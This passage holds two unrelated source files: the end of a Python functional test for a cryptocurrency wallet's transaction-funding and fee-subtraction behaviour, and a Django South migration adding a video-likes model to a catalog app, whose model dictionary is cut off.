count_bytes(result3['hex']), 10 * result_fee_rate) ################################ # Test no address reuse occurs # ################################ result3 = self.nodes[3].fundrawtransaction(rawtx) res_dec = self.nodes[0].decoderawtransaction(result3["hex"]) changeaddress = "" for out in res_dec['vout']: if out['value'] > 1.0: changeaddress += out['scriptPubKey']['addresses'][0] assert(changeaddress != "") nextaddr = self.nodes[3].getnewaddress() # Now the change address key should be removed from the keypool assert(changeaddress != nextaddr) ###################################### # Test subtractFeeFromOutputs option # ###################################### # Make sure there is exactly one input so coin selection can't skew the result assert_equal(len(self.nodes[3].listunspent(1)), 1) inputs = [] outputs = {self.nodes[2].getnewaddress(): 1} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = [self.nodes[3].fundrawtransaction(rawtx), # uses min_relay_tx_fee (set by settxfee) self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": []}), # empty subtraction list self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": [0]}), # uses min_relay_tx_fee (set by settxfee) self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee}), self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee, "subtractFeeFromOutputs": [0]})] dec_tx = [self.nodes[3].decoderawtransaction(tx['hex']) for tx in result] output = [d['vout'][1 - r['changepos']]['value'] for d, r in zip(dec_tx, result)] change = [d['vout'][r['changepos']]['value'] for d, r in zip(dec_tx, result)] assert_equal(result[0]['fee'], result[1]['fee'], result[2]['fee']) assert_equal(result[3]['fee'], result[4]['fee']) assert_equal(change[0], change[1]) assert_equal(output[0], output[1]) assert_equal(output[0], output[2] + result[2]['fee']) assert_equal(change[0] + result[0]['fee'], change[2]) assert_equal(output[3], output[4] + result[4]['fee']) assert_equal(change[3] + result[3]['fee'], change[4]) inputs = [] outputs = {self.nodes[2].getnewaddress(): value for value in (1.0, 1.1, 1.2, 1.3)} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = [self.nodes[3].fundrawtransaction(rawtx), # split the fee between outputs 0, 2, and 3, but not output 1 self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": [0, 2, 3]})] dec_tx = [self.nodes[3].decoderawtransaction(result[0]['hex']), self.nodes[3].decoderawtransaction(result[1]['hex'])] # Nested list of non-change output amounts for each transaction output = [[out['value'] for i, out in enumerate(d['vout']) if i != r['changepos']] for d, r in zip(dec_tx, result)] # List of differences in output amounts between normal and subtractFee transactions share = [o0 - o1 for o0, o1 in zip(output[0], output[1])] # output 1 is the same in both transactions assert_equal(share[1], 0) # the other 3 outputs are smaller as a result of subtractFeeFromOutputs assert_greater_than(share[0], 0) assert_greater_than(share[2], 0) assert_greater_than(share[3], 0) # outputs 2 and 3 take the same share of the fee assert_equal(share[2], share[3]) # output 0 takes at least as much share of the fee, and no more than 2 satoshis more, than outputs 2 and 3 assert_greater_than_or_equal(share[0], share[2]) assert_greater_than_or_equal(share[2] + Decimal(2e-8), share[0]) # the fee is the same in both transactions assert_equal(result[0]['fee'], result[1]['fee']) # the total subtracted from the outputs is equal to the fee assert_equal(share[0] + share[2] + share[3], result[0]['fee']) if __name__ == '__main__': RawTransactionsTest().main()
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'LikeVideo' db.create_table(u'catalog_likevideo', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('added_time', self.gf('django.db.models.fields.DateTimeField')()), ('is_enabled', self.gf('django.db.models.fields.BooleanField')(default=True)), ('score', self.gf('django.db.models.fields.IntegerField')(default=0)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('video', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['catalog.Video'])), )) db.send_create_signal('catalog', ['LikeVideo']) # Adding unique constraint on 'LikeVideo', fields ['user', 'video'] db.create_unique(u'catalog_likevideo', ['user_id', 'video_id']) # Adding field 'Video.likes_count' db.add_column(u'catalog_video', 'likes_count', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False) def backwards(self, orm): # Removing unique constraint on 'LikeVideo', fields ['user', 'video'] db.delete_unique(u'catalog_likevideo', ['user_id', 'video_id']) # Deleting model 'LikeVideo' db.delete_table(u'catalog_likevideo') # Deleting field 'Video.likes_count' db.delete_column(u'catalog_video', 'likes_count') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'catalog.cfistoreitem': { 'Meta': {'object_name': 'CfiStoreItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'item': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalog.Product']", 'unique': 'True'}), 'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cfi_store_item_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeCfiStoreItem']", 'to': u"orm['auth.User']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.comment': { 'Meta': {'object_name': 'Comment'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'body': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.documentation': { 'Meta': {'object_name': 'Documentation'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.emailcollect': { 'Meta': {'object_name': 'EmailCollect'}, 'email': ('django.db.models.fields.EmailField', [], {'max_length': '30'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'catalog.image': { 'Meta': {'object_name': 'Image'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'large_url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}), 'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'small_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'images'", 'null': 'True', 'to': u"orm['auth.User']"}) }, 'catalog.like': { 'Meta': {'object_name': 'Like'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likecfistoreitem': { 'Meta': {'unique_together': "(('user', 'cfi_store_item'),)", 'object_name': 'LikeCfiStoreItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'cfi_store_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.CfiStoreItem']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeimage': { 'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likemakey': { 'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'LikeMakey'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likenote': { 'Meta': {'unique_together': "(('user', 'note'),)", 'object_name': 'LikeNote'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'note': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Note']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproduct': { 'Meta': {'unique_together': "(('user', 'product'),)", 'object_name': 'LikeProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproductdescription': { 'Meta': {'unique_together': "(('user', 'product_description'),)", 'object_name': 'LikeProductDescription'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product_description': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductDescription']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproductimage': { 'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeProductImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductImage']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproducttutorial': { 'Meta': {'unique_together': "(('user', 'tutorial', 'product'),)", 'object_name': 'LikeProductTutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeshop': { 'Meta': {'unique_together': "(('user', 'shop'),)", 'object_name': 'LikeShop'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likevideo': { 'Meta': {'unique_together': "(('user', 'video'),)", 'object_name': 'LikeVideo'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Video']"}) }, 'catalog.list': { 'Meta': {'object_name': 'List'}, 'access': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'access'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}), 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_private': ('django.db.models.fields.BooleanField', [], {}), 'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.ListItem']", 'symmetrical': 'False'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owner'", 'to': u"orm['auth.User']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.listgroup': { 'Meta': {'object_name': 'ListGroup'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.List']", 'symmetrical': 'False'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.listitem': { 'Meta': {'object_name': 'ListItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'createdby': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'note': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.location': { 'Meta': {'object_name': 'Location'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.logidenticalproduct': { 'Meta': {'object_name': 'LogIdenticalProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product1'", 'to': "orm['catalog.Product']"}), 'product2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product2'", 'to': "orm['catalog.Product']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.makey': { 'Meta': {'object_name': 'Makey'}, 'about': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collaborators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeycomments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Comment']"}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'documentations': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeydocumentations'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Documentation']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'new_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}), 'new_users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}), 'notes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeynotes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Note']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyvideos'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Video']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}) }, 'catalog.makeyimage': { 'Meta': {'object_name': 'MakeyImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey_id': ('django.db.models.fields.IntegerField', [], {}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.newproduct': { 'Meta': {'object_name': 'NewProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.newuser': { 'Meta': {'object_name': 'NewUser'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.note': { 'Meta': {'object_name': 'Note'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'body': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.product': { 'Meta': {'object_name': 'Product'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identicalto': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']", 'null': 'True', 'blank': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'product_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeProduct']", 'to': u"orm['auth.User']"}), 'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'partsused'", 'blank': 'True', 'to': "orm['catalog.Makey']"}), 'makeys_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'tools_used'", 'blank': 'True', 'to': "orm['catalog.Makey']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('django.db.models.fields.IntegerField', [], {}), 'tutorials': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'products'", 'blank': 'True', 'to': "orm['catalog.Tutorial']"}) }, 'catalog.productdescription': { 'Meta': {'object_name': 'ProductDescription'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productdescriptions'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'blank': 'True'}), 'user_or_shop': ('django.db.models.fields.BooleanField', [], {}) }, 'catalog.productimage': { 'Meta': {'object_name': 'ProductImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productimages'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'null': 'True', 'blank': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.productreview': { 'Meta': {'object_name': 'ProductReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product_reviews'", 'to': "orm['catalog.Product']"}), 'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.productshopurl': { 'Meta': {'object_name': 'ProductShopUrl'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productshopurls'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.searchlog': { 'Meta': {'object_name': 'SearchLog'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'term': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'time': ('django.db.models.fields.DateTimeField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.shop': { 'Meta': {'object_name': 'Shop'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'shopimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shop_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeShop']", 'to': u"orm['auth.User']"}), 'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.shopreview': { 'Meta': {'object_name': 'ShopReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shop_reviews'", 'to': "orm['catalog.Shop']"}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.toindexstore': { 'Meta': {'object_name': 'ToIndexStore'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 